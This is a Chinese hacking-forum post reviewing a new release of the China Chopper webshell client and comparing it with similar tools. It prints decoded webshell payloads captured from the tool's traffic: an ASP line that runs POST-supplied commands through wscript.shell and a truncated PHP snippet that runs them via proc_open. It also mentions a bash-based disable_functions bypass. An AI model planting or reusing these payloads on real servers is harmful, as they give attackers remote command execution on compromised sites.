TA的每日心情 | 无聊 2017-7-17 14:40 |
---|
签到天数: 62 天 [LV.6]常住居民II
|
新版本菜刀已经发布有1天多了,没看有人评价。我就简单评下,大牛勿喷~
通信方式不变,post数据依旧含有可被定位的特征码(当然如果不改变服务端代码,我也想不出什么好办法),只能POST,软件自由度不及Hatchet。
主要对旧版本菜刀的不足抓包看下新版本是否有所改进
发现还是老样子
一 asp执行命令
解码代码如下:
Set X=CreateObject("wscript.shell").exec(""""&bd(Request("z1"))&""" /c """&bd(Request("z2"))&""""):If Err Then:S="[Err] "&Err.Description:Err.Clear:Else:O=X.StdOut.ReadAll():E=X.StdErr.ReadAll():S=O&E:End If:Response.write(S)
可以看到只是调用了wscript.shell组件执行命令。
而能够执行系统命令的组件可不止这一种
二 php命令执行
@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$m=get_magic_quotes_gpc();$p=base64_decode($m?stripslashes($_POST["z1"])_POST["z1"]);$s=base64_decode($m?stripslashes($_POST["z2"])_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r."
旧版本的菜刀调用system函数执行命令
新版本调用了proc_open执行命令
但是能够执行系统命令的函数可不止这两个,还有前段时间爆出的php利用bash漏洞绕过disable_function等。
(如果有我未发现的新功能,请补充)
个人的感觉:
菜刀作为前两年的神器,现在却慢慢走过辉煌。虽然斧头仿造了菜刀,但是在功能和灵活度上稍稍胜过了菜刀。还有开源的Altman也完全不输菜刀。菜刀的作者有深厚的编程功底,不过感觉在细节上并不是很在意,这款新发布的菜刀不像是3年后积淀的产物。 |
|